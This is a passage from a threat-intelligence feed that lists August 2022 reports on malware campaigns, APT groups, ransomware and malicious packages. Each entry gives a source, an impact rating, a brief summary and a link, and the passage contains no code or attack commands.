Researchers from Fortinet have identified an attack against the telecommunication agency in South Asia that began with a simple email that initially appeared to be a standard malicious spam email message. However, the attached Word document was weaponized using a malicious tool, Royal Road, and is equipped with an exploit for an Equation Editor vulnerability (CVE-2018-0798).
Source: https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis
2022-08-23
A_malicious_use_of_Tox_protocol_for_coinminers
LOW
Intel Source:
Uptycs
Intel Name:
A_malicious_use_of_Tox_protocol_for_coinminers
Date of Scan:
2022-08-23
Impact:
LOW
Summary:
Researchers from Uptycs have examined malware samples that do not do anything explicitly malicious, but they assess that the samples might be part of a coinminer campaign. Additionally, this is the first time they have observed the Tox protocol being used to run scripts on the machine.
Source: https://www.uptycs.com/blog/is-tox-the-new-cc-method-for-coinminers
2022-08-23
Astaroth_Guildma_malware_pushed_by_malspam
LOW
Intel Source:
ISC.SANS
Intel Name:
Astaroth_Guildma_malware_pushed_by_malspam
Date of Scan:
2022-08-23
Impact:
LOW
Summary:
Researchers from SANS have observed an Astaroth (Guildma) malware infection generated from a malicious Boleto-themed email pretending to be from Grupo Solução & CIA. Boleto is a payment method used in Brazil, while Grupo Solução & CIA is a Brazil-based company.
Source: https://isc.sans.edu/diary/rss/28962
2022-08-22
Grandoreiro_Banking_Malware_Targeting_Spanish_and_Mexican_Organizations
LOW
Intel Source:
Zscaler
Intel Name:
Grandoreiro_Banking_Malware_Targeting_Spanish_and_Mexican_Organizations
Date of Scan:
2022-08-22
Impact:
LOW
Summary:
Researchers from Zscaler ThreatLabs have observed a Grandoreiro banking malware campaign. In this campaign, the threat actors impersonate government officials from the Attorney General's Office of Mexico City and from the Public Ministry in the form of spear-phishing emails in order to lure victims to download and execute 'Grandoreiro,' a prolific banking trojan.
Source: https://www.zscaler.com/blogs/security-research/grandoreiro-banking-trojan-new-ttps-targeting-various-industry-verticals
2022-08-22
SocGholish_JavaScript_Malware_Back_into_Action
LOW
Intel Source:
Sucuri
Intel Name:
SocGholish_JavaScript_Malware_Back_into_Action
Date of Scan:
2022-08-22
Impact:
LOW
Summary:
Researchers from Sucuri have analysed the SocGholish JavaScript malware, outlining the injections and URLs used in the website malware portion of the SocGholish attack outside of the NDSW/NDSX campaign.
Source: https://blog.sucuri.net/2022/08/socgholish-5-years-of-massive-website-infections.html
2022-08-22
FIN7_rewrite_JSSLoader_malware_with_expanded_capabilities
MEDIUM
Intel Source:
MalwareBytes
Intel Name:
FIN7_rewrite_JSSLoader_malware_with_expanded_capabilities
Date of Scan:
2022-08-22
Impact:
MEDIUM
Summary:
Researchers at Malwarebytes have identified a malspam campaign in late June that they attribute to the FIN7 APT group. FIN7 has rewritten the JSSLoader malware with expanded capabilities as well as new functions that include data exfiltration.
Source: https://malwarebytes.app.box.com/s/ym6r7o5hq0rx2nxjbctfv2sw5vx386ni
2022-08-22
A_malicious_JavaScript_injection_affecting_WordPress_websites
LOW
Intel Source:
Sucuri
Intel Name:
A_malicious_JavaScript_injection_affecting_WordPress_websites
Date of Scan:
2022-08-22
Impact:
LOW
Summary:
Sucuri researchers observed and analyzed a recent spike in JavaScript injections targeting WordPress sites that result in fake DDoS prevention prompts, which lead victims to download remote access trojan malware.
Source: https://blog.sucuri.net/2022/08/fake-ddos-pages-on-wordpress-lead-to-drive-by-downloads.html
2022-08-22
XWorm_RAT_with_Ransomware_and_HNVC_attack_capabilities
LOW
Intel Source:
Cyble
Intel Name:
XWorm_RAT_with_Ransomware_and_HNVC_attack_capabilities
Date of Scan:
2022-08-22
Impact:
LOW
Summary:
Researchers from Cyble Labs have discovered a dark web post in which a malware developer was advertising a powerful Windows RAT; the post redirects to the malware developer's website, where multiple malicious tools are being sold.
Source: https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/
2022-08-22
New_BianLian_Ransomware_Targeting_Multiple_Industries
MEDIUM
Intel Source:
Cyble
Intel Name:
New_BianLian_Ransomware_Targeting_Multiple_Industries
Date of Scan:
2022-08-22
Impact:
MEDIUM
Summary:
Researchers from Cyble have observed that malware written in the programming language “Go” has recently been popular among Threat Actors. Also, during their daily threat hunting exercise, they came across a Twitter post about a ransomware variant written in Go named BianLian.
Source: https://blog.cyble.com/2022/08/18/bianlian-new-ransomware-variant-on-the-rise/
2022-08-21
APT41_targeted13entitiesinU.S,_Taiwan,_India,_Vietnam_and_China
MEDIUM
Intel Source:
Group-IB
Intel Name:
APT41_targeted13entitiesinU.S,_Taiwan,_India,_Vietnam_and_China
Date of Scan:
2022-08-21
Impact:
MEDIUM
Summary:
Group-IB has been monitoring APT41 activity since 2021 and has produced a report documenting the group's targeting of 13 organizations geographically spanning the U.S., Taiwan, India, Vietnam, and China.
Source: https://blog.group-ib.com/apt41-world-tour-2021
2022-08-21
ATMZOW_JS_Sniffer_Campaign_Connected_to_Hancitor_Malware
MEDIUM
Intel Source:
Group-IB
Intel Name:
ATMZOW_JS_Sniffer_Campaign_Connected_to_Hancitor_Malware
Date of Scan:
2022-08-21
Impact:
MEDIUM
Summary:
Researchers from Group-IB have identified that the ATMZOW JS sniffer campaign and the Hancitor malware downloader were both operated by the same threat actor. They have collected information about ATMZOW's recent activity and found ties with a phishing campaign targeting clients of a US bank, based on the same JS obfuscation technique.
Source: https://blog.group-ib.com/switching-side-jobs
2022-08-20
TA558_Targets_Hospitality_and_Travel_firms
MEDIUM
Intel Source:
ProofPoint
Intel Name:
TA558_Targets_Hospitality_and_Travel_firms
Date of Scan:
2022-08-20
Impact:
MEDIUM
Summary:
Researchers at Proofpoint have been monitoring the activities of threat actor TA558 since 2018, and in 2022 the actor is still targeting hospitality, travel and related industries based in Latin America, North America, and Western Europe. Moreover, TA558 has currently shifted tactics to URLs and container files to distribute malware.
Source: https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel
2022-08-19
Malicious_PyPi_packages_turn_Discord_into_info_stealing_malware
LOW
Intel Source:
Securelist
Intel Name:
Malicious_PyPi_packages_turn_Discord_into_info_stealing_malware
Date of Scan:
2022-08-19
Impact:
LOW
Summary:
Researchers from Kaspersky have analyzed two PyPi packages that contain info-stealing malware and also modify the Discord client as well. The stealers in those packages focus on collecting account credentials from cryptocurrency wallets, Steam, and Minecraft, while an injected script monitors for inputs like email addresses, passwords, and billing information.
Source: https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/
2022-08-19
Newly_Active_Malicious_Scanner_IPs
LOW
Intel Source:
Securonix
Intel Name:
Newly_Active_Malicious_Scanner_IPs
Date of Scan:
2022-08-19
Impact:
LOW
Summary:
Internal scan, No git required
Source: Internal Source
2022-08-19
Reemergence_of_Raccoon_Infostealer_Malware_with_New_TTPS
LOW
Intel Source:
SocInvestigations
Intel Name:
Reemergence_of_Raccoon_Infostealer_Malware_with_New_TTPS
Date of Scan:
2022-08-19
Impact:
LOW
Summary:
SocInvestigation researchers found new TTPs of the Raccoon Infostealer malware. It is an info-stealer malware available as malware-as-a-service on underground forums, and a robust stealer that allows the theft of data such as passwords, cookies, and autofill data from browsers.
Source: https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/
2022-08-19
Attackers_Leveraging_Bumblebee_Loader
LOW
Intel Source:
Cybereason
Intel Name:
Attackers_Leveraging_Bumblebee_Loader
Date of Scan:
2022-08-19
Impact:
LOW
Summary:
The Cybereason GSOC team has analyzed a case involving a Bumblebee Loader infection, in which its operators conducted intensive reconnaissance activities and redirected the output of executed commands to files for exfiltration.
Source: https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control
2022-08-19
Detailed_Analysis_of_Follina_Vulnerability
LOW
Intel Source:
VirusTotal
Intel Name:
Detailed_Analysis_of_Follina_Vulnerability
Date of Scan:
2022-08-19
Impact:
LOW
Summary:
The VirusTotal cyber threat hunting team analyzed the Follina vulnerability in depth and provided a high-level overview of all observed attacks, with a focus on the ones that took place before the 0-day was publicly disclosed, along with practical recommendations on how to monitor and hunt Follina samples.
Source: https://blog.virustotal.com/2022/08/hunting-follina.html
2022-08-19
Lazarus_Group_Targeting_Job_Seekers_with-macOS_Malware
LOW
Intel Source:
ESET
Intel Name:
Lazarus_Group_Targeting_Job_Seekers_with-macOS_Malware
Date of Scan:
2022-08-19
Impact:
LOW
Summary:
Slovak cybersecurity firm ESET has identified the North Korea-backed Lazarus Group targeting job seekers with malware capable of executing on Apple Macs with Intel and M1 chipsets.
Source: https://twitter.com/ESETresearch/status/1559553342057205761
2022-08-19
Diving_Deep_into_DarkTortilla_Malware
LOW
Intel Source:
Secureworks
Intel Name:
Diving_Deep_into_DarkTortilla_Malware
Date of Scan:
2022-08-19
Impact:
LOW
Summary:
Researchers from the Secureworks Counter Threat Unit have found that the long-running DarkTortilla crypter is still evolving. It usually delivers information stealers and remote access trojans (RATs) like AgentTesla, AsyncRat, NanoCore, and RedLine, though some samples have been seen delivering targeted payloads such as Cobalt Strike and Metasploit.
Source: https://www.secureworks.com/research/darktortilla-malware-analysis
2022-08-18
A_new_variant_of_NJRAT
LOW
Intel Source:
Esentire
Intel Name:
A_new_variant_of_NJRAT
Date of Scan:
2022-08-18
Impact:
LOW
Summary:
The eSentire Cyber Threat Hunting team has discovered a new variant of NJRAT which is capable of logging keystrokes, viewing the victim's camera, and remotely controlling the system.
Source: https://www.esentire.com/blog/njrat-comes-disguised-as-video-streaming-software
2022-08-18
Python_s_Top_Packages_attack
LOW
Intel Source:
CheckMarx
Intel Name:
Python_s_Top_Packages_attack
Date of Scan:
2022-08-18
Impact:
LOW
Summary:
Researchers from Checkmarx Security have detected a large-scale attack on the Python ecosystem with multi-stage persistent malware. A PyPI user account published a dozen malicious typosquatting packages under the names of popular projects with slight permutations.
Source: https://medium.com/checkmarx-security/typosquatting-campaign-targeting-12-of-pythons-top-packages-downloading-malware-hosted-on-github-9501f35b8efb
2022-08-18
Iranian_Threat_Actor_UNC3890_targets_Israeli_entities
MEDIUM
Intel Source:
Mandiant
Intel Name:
Iranian_Threat_Actor_UNC3890_targets_Israeli_entities
Date of Scan:
2022-08-18
Impact:
MEDIUM
Summary:
Mandiant researchers found a cyber espionage campaign targeting Israeli entities and organizations of various sectors, including government, shipping, energy and healthcare, via social engineering lures and a potential watering hole. The attacks have been attributed to UNC3890.
Source: https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping
2022-08-18
Cyber_Weapons_Used_in_the_Ukraine_Russia_War
MEDIUM
Intel Source:
Trustwave
Intel Name:
Cyber_Weapons_Used_in_the_Ukraine_Russia_War
Date of Scan:
2022-08-18
Impact:
MEDIUM
Summary:
Cyberattacks leveraging malware are an important part of modern hybrid war strategy. While conventional warfare is conducted on the battlefield and limited by several factors, cyber warfare continues in cyberspace, offering the chance to infiltrate and damage targets far behind the front lines.
Source: https://www.trustwave.com/media/18925/final_spiderlabs_cyber-weapons-used-in-the-ukraine-russia-war.pdf
2022-08-17
Diving_deep_into_RedAlphas_cyber_espionage_activity
LOW
Intel Source:
Recorded Future
Intel Name:
Diving_deep_into_RedAlphas_cyber_espionage_activity
Date of Scan:
2022-08-17
Impact:
LOW
Summary:
Researchers from Recorded Future have analyzed multiple campaigns conducted by the Chinese state-sponsored threat activity group RedAlpha. The group very likely sought to gain access to email accounts and other online communications of targeted individuals and organizations.
Source: https://go.recordedfuture.com/hubfs/reports/ta-2022-0816.pdf
2022-08-17
Surge_in_attack_through_malicious_Browser_Extension
LOW
Intel Source:
Securelist
Intel Name:
Surge_in_attack_through_malicious_Browser_Extension
Date of Scan:
2022-08-17
Impact:
LOW
Summary:
Securelist analysts documented their findings about multiple browser extensions which have been targeting at least 1.31 million users. The most prevalent threat is a family of adware called WebSearch, which masquerades as PDF viewers.
Source: https://securelist.com/threat-in-your-browser-extensions/107181/
2022-08-17
Trend_Micro_Research_on_Cloud_based_Cryptocurrency_mining
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Trend_Micro_Research_on_Cloud_based_Cryptocurrency_mining
Date of Scan:
2022-08-17
Impact:
MEDIUM
Summary:
Trend Micro, in their research document, shared their concerns about the impact on organizations running cloud instances, noting that potential victims of malicious cryptocurrency mining could be from any country or sector, making cloud-based cryptocurrency-mining attacks a global concern for companies.
Source: https://documents.trendmicro.com/assets/white_papers/wp-navigating-the-landscape-of-cloud-based-cryptocurrency-mining.pdf
2022-08-16
Phishing_campaign_by_Russian_Threat_Actor_SEABORGIUM
MEDIUM
Intel Source:
Microsoft
Intel Name:
Phishing_campaign_by_Russian_Threat_Actor_SEABORGIUM
Date of Scan:
2022-08-16
Impact:
MEDIUM
Summary:
MSTIC disrupted a campaign by the Russia-based threat actor SEABORGIUM. Its campaigns involve persistent phishing and credential theft leading to intrusions and data theft.
Source: https://www.microsoft.com/security/blog/2022/08/15/disrupting-seaborgiums-ongoing-phishing-operations/
2022-08-16
Russian_hackers_targeting_Ukraine_with_default_Word_template_hijacker
MEDIUM
Intel Source:
Symantec
Intel Name:
Russian_hackers_targeting_Ukraine_with_default_Word_template_hijacker
Date of Scan:
2022-08-16
Impact:
MEDIUM
Summary:
Researchers from Symantec have observed campaigns that show phishing messages carrying a self-extracting 7-Zip archive that fetches an XML file from an “xsph.ru” subdomain associated with Gamaredon since May 2022.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm
2022-08-16
PyPI_Package_Drops_Fileless_Cryptominer_to_Linux_Systems
LOW
Intel Source:
Sonatype
Intel Name:
PyPI_Package_Drops_Fileless_Cryptominer_to_Linux_Systems
Date of Scan:
2022-08-16
Impact:
LOW
Summary:
Researchers from Sonatype have identified a PyPI package named 'secretslib' that describes itself as 'secrets matching and verification made easy'. On closer inspection, though, the package covertly runs cryptominers in memory on the Linux machine, a technique largely employed by fileless malware and crypters.
Source: https://blog.sonatype.com/pypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero
2022-08-16
UAC_0010_Armageddon_leveraging_GammaLoad_and_GammaSteel_malwares
LOW
Intel Source:
CERT-UA
Intel Name:
UAC_0010_Armageddon_leveraging_GammaLoad_and_GammaSteel_malwares
Date of Scan:
2022-08-16
Impact:
LOW
Summary:
CERT-UA has tracked an attack since the first half of 2022 in which the distribution of HTM droppers via email leads to delivery of the GammaLoad.PS1 malware, which later delivers GammaSteel.PS1.
Source: https://cert.gov.ua/article/1229152
2022-08-16
Typhon_Stealer_being_spread_through_Phishing_sites
LOW
Intel Source:
Cyble
Intel Name:
Typhon_Stealer_being_spread_through_Phishing_sites
Date of Scan:
2022-08-16
Impact:
LOW
Summary:
Cyble researchers analyzed a sample URL which hosts a Windows executable payload. This Windows executable is a variant of the Typhon stealer malware, delivered via a crafted .lnk file.
Source: https://blog.cyble.com/2022/08/16/phishing-site-used-to-spread-typhon-stealer/
2022-08-15
A_chat_application_MiMi_compromised_by_Iron_Tiger_malware
MEDIUM
Intel Source:
TrendMicro
Intel Name:
A_chat_application_MiMi_compromised_by_Iron_Tiger_malware
Date of Scan:
2022-08-15
Impact:
MEDIUM
Summary:
Researchers from Trend Micro discovered a server hosting the malicious samples that compromised the chat application MiMi. The samples belong to the HyperBro malware family used by Iron Tiger, an advanced persistent threat (APT) group that has been performing cyberespionage for almost a decade and is now targeting Windows and macOS.
Source: https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html
2022-08-15
MikuBot_spies_on_Victims_using_hidden_VNC
MEDIUM
Intel Source:
Cyble
Intel Name:
MikuBot_spies_on_Victims_using_hidden_VNC
Date of Scan:
2022-08-15
Impact:
MEDIUM
Summary:
Researchers at Cyble Research Labs have identified a new malware called 'MikuBot', which a threat actor was advertising in cybercrime forums. The bot steals sensitive data and runs hidden VNC sessions that allow threat actors to remotely access the target's system.
Source: https://blog.cyble.com/2022/08/11/mikubot-spotted-in-the-wild/
2022-08-15
The_observation_of_Conti_Group_activity_used_by_Russian_threat_actors
MEDIUM
Intel Source:
Weixin
Intel Name:
The_observation_of_Conti_Group_activity_used_by_Russian_threat_actors
Date of Scan:
2022-08-15
Impact:
MEDIUM
Summary:
Qi Anxin Threat Intelligence Center has been tracking Russian-speaking threat actors and observed that the Conti group used Exchange vulnerabilities to target companies labelled "rich".
Source: https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g
2022-08-15
A_new_deployment_of_CopperStealer_s_distributing_malware
MEDIUM
Intel Source:
TrendMicro
Intel Name:
A_new_deployment_of_CopperStealer_s_distributing_malware
Date of Scan:
2022-08-15
Impact:
MEDIUM
Summary:
Trend Micro publicly shared their analysis of a new development in CopperStealer's malware distribution, which abuses a browser stealer, an adware browser extension, or remote desktop.
Source: https://www.trendmicro.com/en_us/research/22/h/copperstealer-distributes-malicious-chromium-browser-extension-steal-cryptocurrencies.html
2022-08-12
Zeppelin_Ransomware
MEDIUM
Intel Source:
CISA
Intel Name:
Zeppelin_Ransomware
Date of Scan:
2022-08-12
Impact:
MEDIUM
Summary:
CISA and the FBI have published a joint cybersecurity advisory (AA22-223A) on Zeppelin ransomware.
Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-223a
2022-08-12
A_new_upgrade_on_the_activity_of_APT_C_35_or_DoNot_Team
MEDIUM
Intel Source:
Morphisec
Intel Name:
A_new_upgrade_on_the_activity_of_APT_C_35_or_DoNot_Team
Date of Scan:
2022-08-12
Impact:
MEDIUM
Summary:
Researchers at Morphisec Labs have monitored the activity of DoNot Team/APT-C-35, where the group has added a new module to its Windows framework.
Source: https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed
2022-08-12
A_distribution_of_Monero_CoinMiner_by_Webhards
LOW
Intel Source:
ASEC
Intel Name:
A_distribution_of_Monero_CoinMiner_by_Webhards
Date of Scan:
2022-08-12
Impact:
LOW
Summary:
The ASEC analysis team has discovered that Monero CoinMiner, also known as XMRig, is being distributed via file-sharing websites such as Korean webhards and torrents.
Source: https://asec.ahnlab.com/en/37526/
2022-08-12
Onyx_Ransomware_s_Recent_Operations
LOW
Intel Source:
Cyble
Intel Name:
Onyx_Ransomware_s_Recent_Operations
Date of Scan:
2022-08-12
Impact:
LOW
Summary:
Cyble researchers found an updated Onyx ransomware which is based on Chaos ransomware and that ransomware renamed its leak site from “ONYX NEWS” to “VSOP NEWS.”
Source: https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/
2022-08-11
Tropical_Scorpius_deploys_ROMCOM_RAT_in_Cuba_Ransomware_operations
MEDIUM
Intel Source:
Palo Alto
Intel Name:
Tropical_Scorpius_deploys_ROMCOM_RAT_in_Cuba_Ransomware_operations
Date of Scan:
2022-08-11
Impact:
MEDIUM
Summary:
A threat actor dubbed Tropical Scorpius by Palo Alto researchers has changed its TTPs and is also said to be associated with Cuba ransomware operations.
Source: https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/
2022-08-11
BlueSky_Ransomware_targets_Windows_hosts_and_utilizes_multithreading
MEDIUM
Intel Source:
Palo Alto
Intel Name:
BlueSky_Ransomware_targets_Windows_hosts_and_utilizes_multithreading
Date of Scan:
2022-08-11
Impact:
MEDIUM
Summary:
Researchers at Palo Alto have analysed code samples of BlueSky ransomware, which they found to be connected with the Conti ransomware group. The multithreaded structure of BlueSky shows code similarities with Conti v3. Moreover, BlueSky's file encryption algorithm also closely resembles that of Babuk ransomware.
Source: https://unit42.paloaltonetworks.com/bluesky-ransomware/
2022-08-11
AiTM_attack_targets_Gmail_Enterprise_users
MEDIUM
Intel Source:
Zscaler
Intel Name:
AiTM_attack_targets_Gmail_Enterprise_users
Date of Scan:
2022-08-11
Impact:
MEDIUM
Summary:
Zscaler researchers followed up on their earlier findings about an AiTM phishing campaign against Microsoft email services and found that the same campaign has been targeting enterprise users of Gmail.
Source: https://www.zscaler.com/blogs/security-research/aitm-phishing-attack-targeting-enterprise-users-gmail
2022-08-11
DeathStalker's_VileRAT_continue_target_Foreign_and_Crypto_Exchanges
MEDIUM
Intel Source:
Securelist
Intel Name:
DeathStalker's_VileRAT_continue_target_Foreign_and_Crypto_Exchanges
Date of Scan:
2022-08-11
Impact:
MEDIUM
Summary:
Securelist has shared that the threat actor known as DeathStalker has continued to target and disrupt foreign and cryptocurrency exchanges around the world throughout 2022 using the VileRAT malware. Since late 2021 the infection technique has changed slightly, but the initial infection vector is still a malicious message sent to targets via email. In July 2022, Securelist also noticed that the attackers leveraged chatbots embedded in targeted companies' public websites to send malicious DOCX files to their targets.
Source: https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/
2022-08-11
Raspberry_Robin_tries_to_remain_undetected
MEDIUM
Intel Source:
Cisco
Intel Name:
Raspberry_Robin_tries_to_remain_undetected
Date of Scan:
2022-08-11
Impact:
MEDIUM
Summary:
Researchers at Cisco have analysed a distinctive pattern of msiexec.exe usage across different endpoints. As they drilled down to individual assets, they found traces of Raspberry Robin malware.
Source: https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks
2022-08-11
Emotet_re-introduction_SMB_spreader_module
LOW
Intel Source:
Bitsight
Intel Name:
Emotet_re-introduction_SMB_spreader_module
Date of Scan:
2022-08-11
Impact:
LOW
Summary:
Researchers at Bitsight have observed the Emotet botnet version Epoch4 delivering a new module to infected systems that turned out to be a credit card stealer targeting Google Chrome. Later, they found that Emotet Epoch4 also re-introduced the SMB spreader module.
Source: https://www.bitsight.com/blog/emotet-smb-spreader-back
2022-08-11
Yanluowang ransomware gang targets Cisco
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
Yanluowang ransomware gang targets Cisco
Date of Scan:
2022-08-11
Impact:
MEDIUM
Summary:
Cisco Talos has analyzed a recent attack on Cisco by Yanluowang ransomware group which breached its corporate network in late May. The attackers could only harvest and steal non-sensitive data from a Box folder linked to a compromised employee's account.
Source: https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html
2022-08-10
Korean_speaking_APT_deploys_DTrack_and_Maui_Ransomware
MEDIUM
Intel Source:
Securelist
Intel Name:
Korean_speaking_APT_deploys_DTrack_and_Maui_Ransomware
Date of Scan:
2022-08-10
Impact:
MEDIUM
Summary:
Researchers from Securelist were able to attribute the Maui ransomware attack to a Korean-speaking APT group called Andariel. They also found that before deploying the ransomware, the group deployed a variant of the DTrack malware.
Source: https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/
2022-08-10
IcedID_or_Bokbot_infection_led_to_Cobalt_Strike
MEDIUM
Intel Source:
Palo Alto
Intel Name:
IcedID_or_Bokbot_infection_led_to_Cobalt_Strike
Date of Scan:
2022-08-10
Impact:
MEDIUM
Summary:
Securonix Threat Labs has monitored OSINT sources and identified a new infection of IcedID delivering CobaltStrike.
Source: https://twitter.com/Unit42_Intel/status/1557009330762809348 https://github.com/pan-unit42/tweets/blob/master/2022-08-08-IOCs-for-IcedID-and-Cobalt-Strike.txt
2022-08-10
SmokeLoader_malware_drops_zgRAT_by_exploiting_old_flaws
MEDIUM
Intel Source:
Fortinet
Intel Name:
SmokeLoader_malware_drops_zgRAT_by_exploiting_old_flaws
Date of Scan:
2022-08-10
Impact:
MEDIUM
Summary:
Researchers at FortiGuard Labs have analysed a recent instance of SmokeLoader in which the malware exploits the five-year-old vulnerabilities CVE-2017-0199 and CVE-2017-11882. This sample drops zgRAT, a rare payload compared to those previously delivered by SmokeLoader.
Source: https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities?&web_view=true
2022-08-10
LogoKit_returns_leveraging_Open_Redirect_Vulnerabilities
LOW
Intel Source:
Resecurity
Intel Name:
LogoKit_returns_leveraging_Open_Redirect_Vulnerabilities
Date of Scan:
2022-08-10
Impact:
LOW
Summary:
Researchers at Resecurity have discovered that threat actors are leveraging open redirect vulnerabilities in popular online services and apps to bypass spam filters and ultimately deliver phishing content.
Source: https://resecurity.com/blog/article/logokit-update-the-phishing-kit-leveraging-open-redirect-vulnerabilities
2022-08-09
Drilling_down_into_SharpEx_browser_extension_malware
LOW
Intel Source:
Walmart
Intel Name:
Drilling_down_into_SharpEx_browser_extension_malware
Date of Scan:
2022-08-09
Impact:
LOW
Summary:
Walmart researchers further drilled down on analyzing a browser extension dubbed SharpExt, used by the North Korean threat actor Kimsuky. The goal of the extension is to steal emails and attachments from the victims.
Source: https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9
2022-08-09
Chinese_APT_group_targets_Asia_and_Eastern_Europe
MEDIUM
Intel Source:
Kaspersky
Intel Name:
Chinese_APT_group_targets_Asia_and_Eastern_Europe
Date of Scan:
2022-08-09
Impact:
MEDIUM
Summary:
Kaspersky researchers found a series of attacks targeting organizations in Asia and Eastern Europe. These attacks have been attributed to the Chinese APT group TA428.
Source: https://ics-cert.kaspersky.com/publications/reports/2022/08/08/targeted-attack-on-industrial-enterprises-and-public-institutions/
2022-08-09
Orchard_Botnet_used_to_generate_malicious_domains
LOW
Intel Source:
Netlab 360
Intel Name:
Orchard_Botnet_used_to_generate_malicious_domains
Date of Scan:
2022-08-09
Impact:
LOW
Summary:
Researchers from Qihoo 360's Netlab security team came across a new botnet named Orchard which was using Bitcoin creator Satoshi Nakamoto's account transaction information to generate malicious domain names to conceal its command-and-control (C2) infrastructure.
Source: https://blog.netlab.360.com/a-new-botnet-orchard-generates-dga-domains-with-bitcoin-transaction-information/
2022-08-09
BumbleBee_malware_found_its_way_to_Domain_Admin
MEDIUM
Intel Source:
DFIR Report
Intel Name:
BumbleBee_malware_found_its_way_to_Domain_Admin
Date of Scan:
2022-08-09
Impact:
MEDIUM
Summary:
DFIR Report researchers analyzed an intrusion which involved BumbleBee as the initial access vector. The intrusion began with a password protected zipped ISO file.
Source: https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/
2022-08-08
APT31_targets_Russian_companies
MEDIUM
Intel Source:
PTSecurity
Intel Name:
APT31_targets_Russian_companies
Date of Scan:
2022-08-08
Impact:
MEDIUM
Summary:
PT Expert Security Center analysts found an attack targeting Russian media and energy companies. These attacks have been attributed to APT31.
Source: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/
2022-08-08
GwisinLocker_Ransomware_Targets_Linux_Based_Systems
LOW
Intel Source:
ReversingLabs
Intel Name:
GwisinLocker_Ransomware_Targets_Linux_Based_Systems
Date of Scan:
2022-08-08
Impact:
LOW
Summary:
A new ransomware family called 'GwisinLocker' has emerged targeting South Korean healthcare, industrial, and pharmaceutical companies with Windows and Linux encryptors.
Source: https://blog.reversinglabs.com/blog/gwisinlocker-ransomware-targets-south-korean-industrial-and-pharmaceutical-companies
2022-08-08
Two_cyber_espionage_operations_by_Bitter_APT_and_APT36
MEDIUM
Intel Source:
Meta
Intel Name:
Two_cyber_espionage_operations_by_Bitter_APT_and_APT36
Date of Scan:
2022-08-08
Impact:
MEDIUM
Summary:
Researchers at Meta have published a quarterly threat report in which they took action against two cyber espionage operations in South Asia, linked to Bitter APT and APT36 respectively. The researchers have also shared new and noteworthy TTPs for both actors.
Source: https://about.fb.com/wp-content/uploads/2022/08/Quarterly-Adversarial-Threat-Report-Q2-2022.pdf
2022-08-08
Four_CATAPULT_SPIDER_Challenges
LOW
Intel Source:
Crowdstrike
Intel Name:
Four_CATAPULT_SPIDER_Challenges
Date of Scan:
2022-08-08
Impact:
LOW
Summary:
CrowdStrike has published a blog describing the intended approach to solving the challenges of the eCrime track. Participants in the Adversary Quest analyzed new activity by CATAPULT SPIDER.
Source: https://www.crowdstrike.com/blog/catapult-spider-adversary-quest-walkthrough-2022/
2022-08-05
A_new_IoT_malware_family_called_RapperBot
MEDIUM
Intel Source:
Fortinet
Intel Name:
A_new_IoT_malware_family_called_RapperBot
Date of Scan:
2022-08-05
Impact:
MEDIUM
Summary:
FortiGuard Labs has identified a new family of IoT malware that uses code derived from the Mirai network to gain access to SSH servers and maintain persistence on a victim device after it is removed.
Source: https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery
2022-08-05
Bumblebee_malware_activity_distributed_through_Projector_Libra
MEDIUM
Intel Source:
Palo Alto
Intel Name:
Bumblebee_malware_activity_distributed_through_Projector_Libra
Date of Scan:
2022-08-05
Impact:
MEDIUM
Summary:
Researchers from Palo Alto have identified Bumblebee malware being distributed through Projector Libra, a criminal group that uses file sharing services to distribute malware after direct email correspondence with a potential victim.
Source: https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/
2022-08-05
Threat_Actor_leverages_Confluence_Bug_to_Deploy_Ljl_Backdoor
MEDIUM
Intel Source:
Deepwatch
Intel Name:
Threat_Actor_leverages_Confluence_Bug_to_Deploy_Ljl_Backdoor
Date of Scan:
2022-08-05
Impact:
MEDIUM
Summary:
A novel backdoor called Ljl was discovered by the Deepwatch Adversary Tactics and Intelligence Team. "The evidence indicates that the threat actor executed malicious commands with a parent process of tomcat9.exe in Atlassian's Confluence directory," the company said. "After the initial compromise, the threat actor ran various commands to enumerate the local system, network, and Active Directory environment."
Source: https://cdn1.hubspot.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/eBooks/Deepwatch%20Incident%20Intel%20Report%20-%20Novel%20Backdoor%20Discovered%20-%20Aug%202022.pdf https://5556002.fs1.hubspotusercontent-na1.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/Reports/ljlBackdoor%20Analysis.pdf
2022-08-04
A_distribution_of_malicious_Word_files_with_North_Korea_related_materials
LOW
Intel Source:
ASEC
Intel Name:
A_distribution_of_malicious_Word_files_with_North_Korea_related_materials
Date of Scan:
2022-08-04
Impact:
LOW
Summary:
